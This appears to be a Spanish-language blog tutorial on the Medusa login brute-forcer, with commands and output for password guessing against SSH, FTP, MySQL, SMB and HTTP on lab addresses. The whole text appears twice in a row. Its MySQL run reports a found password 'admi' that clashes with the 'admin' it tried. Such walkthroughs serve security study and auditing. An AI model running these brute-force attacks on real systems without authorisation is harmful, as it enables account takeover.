Qué es Medusa?
El man lo describe como: "Auditor de Login de Red Paralelo", es una aplicación para realizar Fuerza Bruta de Passwords.
Se denomina paralelo debido a que está basado en Hilos para testeo concurrente de varios hosts, usuarios ó passwords.
Posee un diseño modular, cada servicio existe como un módulo independiente en archivos .mod.
Instalamos medusa:
# apt-get install medusa
Vemos que módulos soporta:
# medusa -d
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
Available modules in "." :
Available modules in "/usr/lib/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0
+ http.mod : Brute force module for HTTP : version 2.0
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ ncp.mod : Brute force module for NCP sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0
+ svn.mod : Brute force module for Subversion sessions : version 2.0
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.0
+ web-form.mod : Brute force module for web forms : version 2.0
+ wrapper.mod : Generic Wrapper Module : version 2.0
Fuerza Bruta a SSH:
# medusa -h localhost -u root -P /root/pass.txt -M ssh -n 2222
-h Indicamos la Ip del host al cual queremos hacer fuerza bruta (127.0.0.1)
-u El usuario del server (root)
-P Especificamos la ruta al archivo de lista de posibles passwords
-M Es el módulo que deseamos (SSH, FTP, etc)
-n Cambiamos el puerto que por defecto es el 22 (a 2222)
Vemos los intentos y cuando logra encontrar el password:
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
The default build of Libssh2 is to use OpenSSL for crypto. Several Linux
distributions (e.g. Debian, Ubuntu) build it to use Libgcrypt. Unfortunately,
the implementation within Libssh2 of libgcrypt appears to be broken and is
not thread safe. If you run multiple concurrent Medusa SSH connections, you
are likely to experience segmentation faults. Please help Libssh2 fix this
issue or encourage your distro to use the default Libssh2 build options.
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (1 of 8 complete)
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: peterete (2 of 8 complete)
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mi_pass (3 of 8 complete)
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: otro.mas (4 of 8 complete)
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: pass (5 of 8 complete)
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mi_passwd (6 of 8 complete)
ACCOUNT FOUND: [ssh] Host: localhost User: root Password: mi_passwd
Ahora veremos medusa para Fuerza Bruta de FTP:
# medusa -C pass.txt -M ftp
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ERROR: Thread B6BD6B70: Host: 192.168.1.101 Cannot connect [unreachable], retrying (1 of 3 retries)
ERROR: Thread B6BD6B70: Host: 192.168.1.101 Cannot connect [unreachable], retrying (2 of 3 retries)
ERROR: Thread B6BD6B70: Host: 192.168.1.101 Cannot connect [unreachable], retrying (3 of 3 retries)
NOTICE: ftp.mod: failed to connect, port 21 was not open on 192.168.1.101
ACCOUNT CHECK: Host: 192.168.1.150 (2 of 3, 1 complete) User: ftp_user (1 of 2, 0 complete) Password: ftp_pass (1 of 4 complete)
ACCOUNT FOUND: Host: 192.168.1.150 User: ftp_user Password: ftp_pass
ACCOUNT CHECK: Host: 192.168.1.150 (2 of 3, 1 complete) User: user1 (2 of 2, 1 complete) Password: peterete (1 of 1 complete)
ERROR: Thread B5AD0B70: Host: 192.168.1.200 Cannot connect [unreachable], retrying (1 of 3 retries)
ERROR: Thread B5AD0B70: Host: 192.168.1.200 Cannot connect [unreachable], retrying (2 of 3 retries)
ERROR: Thread B5AD0B70: Host: 192.168.1.200 Cannot connect [unreachable], retrying (3 of 3 retries)
Fuerza bruta del user root del mysql en el localhost:
# medusa -h localhost -u root -P pass.txt -M mysql
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ACCOUNT CHECK: Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (1 of 9 complete)
ACCOUNT CHECK: Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: telev (2 of 9 complete)
ACCOUNT CHECK: Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: peterete (3 of 9 complete)
ACCOUNT CHECK: Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mi_pass (4 of 9 complete)
ACCOUNT CHECK: Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: admin (5 of 9 complete)
ACCOUNT FOUND: Host: localhost User: root Password: admi
Fuerza bruta a SMB:
# medusa -h 192.168.1.100 -u admin -P /root/pass.txt -M smbnt
ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: pepe (1 of 6 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (2 of 6 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 1234 (3 of 6 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: miPass (4 of 6 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.100 User: admin Password: miPass
Fuerza bruta http:
#root@prueba:~# medusa -h 192.168.1.100 -u admin -P /root/wordlist.txt -M http
ACCOUNT CHECK: Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: qwerty (1 of 6 complete)
ACCOUNT CHECK: Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 1234 (2 of 6 complete)
ACCOUNT CHECK: Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: pepe (3 of 6 complete)
ACCOUNT CHECK: Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: miPass (4 of 6 complete)
ACCOUNT FOUND: Host: 192.168.1.100 User: admin Password: miPass
Más info en: http://www.redes-seguridad.com.ar
El man lo describe como: "Auditor de Login de Red Paralelo", es una aplicación para realizar Fuerza Bruta de Passwords.
Se denomina paralelo debido a que está basado en Hilos para testeo concurrente de varios hosts, usuarios ó passwords.
Posee un diseño modular, cada servicio existe como un módulo independiente en archivos .mod.
Instalamos medusa:
# apt-get install medusa
Vemos que módulos soporta:
# medusa -d
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
Available modules in "." :
Available modules in "/usr/lib/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0
+ http.mod : Brute force module for HTTP : version 2.0
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ ncp.mod : Brute force module for NCP sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0
+ svn.mod : Brute force module for Subversion sessions : version 2.0
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.0
+ web-form.mod : Brute force module for web forms : version 2.0
+ wrapper.mod : Generic Wrapper Module : version 2.0
Fuerza Bruta a SSH:
# medusa -h localhost -u root -P /root/pass.txt -M ssh -n 2222
-h Indicamos la Ip del host al cual queremos hacer fuerza bruta (127.0.0.1)
-u El usuario del server (root)
-P Especificamos la ruta al archivo de lista de posibles passwords
-M Es el módulo que deseamos (SSH, FTP, etc)
-n Cambiamos el puerto que por defecto es el 22 (a 2222)
Vemos los intentos y cuando logra encontrar el password:
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
The default build of Libssh2 is to use OpenSSL for crypto. Several Linux
distributions (e.g. Debian, Ubuntu) build it to use Libgcrypt. Unfortunately,
the implementation within Libssh2 of libgcrypt appears to be broken and is
not thread safe. If you run multiple concurrent Medusa SSH connections, you
are likely to experience segmentation faults. Please help Libssh2 fix this
issue or encourage your distro to use the default Libssh2 build options.
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (1 of 8 complete)
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: peterete (2 of 8 complete)
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mi_pass (3 of 8 complete)
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: otro.mas (4 of 8 complete)
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: pass (5 of 8 complete)
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mi_passwd (6 of 8 complete)
ACCOUNT FOUND: [ssh] Host: localhost User: root Password: mi_passwd
Ahora veremos medusa para Fuerza Bruta de FTP:
# medusa -C pass.txt -M ftp
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ERROR: Thread B6BD6B70: Host: 192.168.1.101 Cannot connect [unreachable], retrying (1 of 3 retries)
ERROR: Thread B6BD6B70: Host: 192.168.1.101 Cannot connect [unreachable], retrying (2 of 3 retries)
ERROR: Thread B6BD6B70: Host: 192.168.1.101 Cannot connect [unreachable], retrying (3 of 3 retries)
NOTICE: ftp.mod: failed to connect, port 21 was not open on 192.168.1.101
ACCOUNT CHECK: Host: 192.168.1.150 (2 of 3, 1 complete) User: ftp_user (1 of 2, 0 complete) Password: ftp_pass (1 of 4 complete)
ACCOUNT FOUND: Host: 192.168.1.150 User: ftp_user Password: ftp_pass
ACCOUNT CHECK: Host: 192.168.1.150 (2 of 3, 1 complete) User: user1 (2 of 2, 1 complete) Password: peterete (1 of 1 complete)
ERROR: Thread B5AD0B70: Host: 192.168.1.200 Cannot connect [unreachable], retrying (1 of 3 retries)
ERROR: Thread B5AD0B70: Host: 192.168.1.200 Cannot connect [unreachable], retrying (2 of 3 retries)
ERROR: Thread B5AD0B70: Host: 192.168.1.200 Cannot connect [unreachable], retrying (3 of 3 retries)
Fuerza bruta del user root del mysql en el localhost:
# medusa -h localhost -u root -P pass.txt -M mysql
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ACCOUNT CHECK: Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (1 of 9 complete)
ACCOUNT CHECK: Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: telev (2 of 9 complete)
ACCOUNT CHECK: Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: peterete (3 of 9 complete)
ACCOUNT CHECK: Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mi_pass (4 of 9 complete)
ACCOUNT CHECK: Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: admin (5 of 9 complete)
ACCOUNT FOUND: Host: localhost User: root Password: admi
Fuerza bruta a SMB:
# medusa -h 192.168.1.100 -u admin -P /root/pass.txt -M smbnt
ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: pepe (1 of 6 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (2 of 6 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 1234 (3 of 6 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: miPass (4 of 6 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.100 User: admin Password: miPass
Fuerza bruta http:
#root@prueba:~# medusa -h 192.168.1.100 -u admin -P /root/wordlist.txt -M http
ACCOUNT CHECK: Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: qwerty (1 of 6 complete)
ACCOUNT CHECK: Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 1234 (2 of 6 complete)
ACCOUNT CHECK: Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: pepe (3 of 6 complete)
ACCOUNT CHECK: Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: miPass (4 of 6 complete)
ACCOUNT FOUND: Host: 192.168.1.100 User: admin Password: miPass
Más info en: http://www.redes-seguridad.com.ar